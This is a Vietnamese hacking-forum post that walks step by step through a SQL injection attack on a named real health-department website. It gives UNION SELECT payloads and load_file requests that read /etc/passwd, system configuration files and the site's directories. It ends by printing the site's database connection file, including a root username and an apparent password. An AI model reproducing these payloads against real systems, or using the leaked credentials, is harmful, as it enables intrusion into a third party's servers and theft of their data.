Pham_loi: [red]Basic - Unable to run Query[/red] victim :

Home · Bang hội ·
Đăng Nhập hoặc Đăng Kí để sử dụng hết chức năng của diễn đàn.

Hi, Khách!

Bang hội » Wapmaster » Hacking » » Xem bài viết

Tìm kiếm

Pham_loi

Chức vụ:

00:35:29, 18-02-2016

Basic - Unable to run Query
victim : http://www.clarkhealthdept.org/news.phtml?id=2
ok, check lỗi
http://www.clarkhealthdept.org/news.phtml?id=2'
lỗi xuất hiện

Mã:

Unable to run Query to get news

Copy code

với lỗi này, kĩ thuật cũng hơi phức tạp 1 tí thui
ok, ta khai thác như bình thường, nhưng bạn để
ok

Mã:

http://www.clarkhealthdept.org/news.phtml?id=-999 union select 0,1,2,3,4/*

Copy code

nếu thiếu số 0, chẳng ra cái jì cả
hoặc bạn có thể cho
ok, nó hiện ra

Mã:

2
00/01/2000
3

Copy code

giờ coi version thử nhá

Mã:

http://www.clarkhealthdept.org/news.phtml?id=null union select 0,1,2,version(),4/*

Copy code

giờ dùng chiêu load_file nào )

Mã:

http://www.clarkhealthdept.org/news.phtml?id=null%20union%20select%200,1,2,load_file("/etc/passwd"),4/*

Copy code

ặc ặc jì thế này
chú ý

Mã:

news:*:8:8:News Subsystem:/:/sbin/nologin

Copy code

rùi, ta làm jì nữa nhỉ
read file nhỉ

Mã:

http://www.clarkhealthdept.org/news.phtml?id=null%20union%20select%200,1,2,load_file("/usr/local/include"),4/*

Copy code

mún đọc file jì, cứ thêm đằng sau local/

Mã:

http://www.clarkhealthdept.org/news.phtml?id=null%20union%20select%200,1,2,load_file("/usr/local/www"),4/*

Copy code

ta phải xác định userid nữa
ta dùng 1 câu lệnh như sau.

Mã:

http://www.clarkhealthdept.org/news.phtml?id=null%20union%20select%200,1,2,load_file("/etc/rc.conf"),4/*

Copy code

KQ thu được: hostname=blackfoot.meginc.com" chẳng có gì ở đây. nhưng thông tin này cũng nên quan tâm.
Khi truy vấn câu lệnh này.

Mã:

http://www.clarkhealthdept.org/news.phtml?id=null%20union%20select%200,1,2,load_file("/usr/local/www"),4/*

Copy code

Ta có thể thấy 1 dòng chữ meginc ===> có lẽ đây là userid rồi đấy.

Mã:

http://www.clarkhealthdept.org/news.phtml?id=null%20union%20select%200,1,2,load_file("/usr/local/www/meginc/"),4/*

Copy code

lại hiện ra 1 loạt cái gì đó đúng h0k. lang thang kiếm được cái folder admin nè.

Mã:

http://www.clarkhealthdept.org/news.phtml?id=null%20union%20select%200,1,2,load_file("/usr/local/www/meginc/admin/"),4/*

Copy code

hiện ra tùm lun cái gì gì đó. db_connect.phtml ===> ơ thế cái này là cái gì nhỉ.

Mã:

http://www.clarkhealthdept.org/news.phtml?id=null%20union%20select%200,1,2,load_file("/usr/local/www/meginc/admin/db_connect.phtml"),4/*

Copy code

ô la lá

Mã:

$hostname=blackfoot.meginc.com";
$db_username=root";
$db_password=jd4495jv";
$db_name=meg";

Copy code

cái gì vậy ta. thôy đến đây là đủ rồi.

: 0 ♥

Trực Tuyến: Khách: 1

Diễn đàn teen Việt Nam
CopyRight 2014

Tag:
Bạn đến từ:
Share:

Gọi admin | SMS admin
Facebook:Nhox Attend

Thanks To:XtGem

Liên kết:
Tool tiện ích admin,KhoGame360,Blog thủ thuật,kenh380
,truyen23h
,tai hinh nen naruto,kenhpro - wap hay,vmt - wap hay, Trần Phú Hiền Blog
↑↑lên đầu trang↑↑

Log in